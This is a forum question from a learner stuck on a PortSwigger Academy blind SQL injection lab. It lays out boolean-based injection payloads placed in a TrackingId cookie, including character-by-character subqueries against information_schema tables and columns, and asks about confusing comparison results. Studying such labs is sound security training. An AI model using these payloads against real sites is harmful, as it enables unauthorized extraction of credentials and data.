Blind SQLi – guessing column name
I am learning Blind SQLi with Port Swigger Academy but I am stuck on this lab: https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses.
In this lab I have to get the user 'administrator' password from the table: 'users', columns: 'username','password' using blind SQLi located in a cookie. I can discover the table name 'users' and column 'username' but I can not discover the column 'password'
My steps are as follows:
- Check if SQL occurs in the cookie by modifying cookie:
Cookie: TrackingId=abcdefghijk' AND '1'='1
and I have got a response "Welcome back!". When cookie:Cookie: TrackingId=abcdefghijk' AND '1'='2
there is no "Welcome back!" announcement. So there is SQLi - Check table name.
' AND (SELECT table_name FROM information_schema.tables LIMIT 1) > 'u
if true ('Welcome back!) I am trying the next letter a -> b -> c if false I move to next letter position ua -> ub -> uc and so on . I guessed that table nameusers
exists. I know that I can just try' AND (SELECT 'a' FROM users LIMIT 1) = 'a
but it's a pure guess - Now is the hard part for me, check column name.
' AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'u
. The same method as above letter by letter but there is something wrong because:AND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'use
return trueAND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'usz
return falseAND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'username
return falseAND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) = 'username
return trueAND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'password
return trueAND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) = 'password
return falseAND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'aaaaaaaaaaaaaaa
return trueAND (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) > 'z
return false.
I do not understand this. If 'use' is true and 'usz' is false why then is 'password' true? Letter 's' is higher than 'e' so it should be false. I can not imagine the answer of this query. If query answer is 'username' how do you guess the second column 'password'? I tried to change LIMIT but that does not work.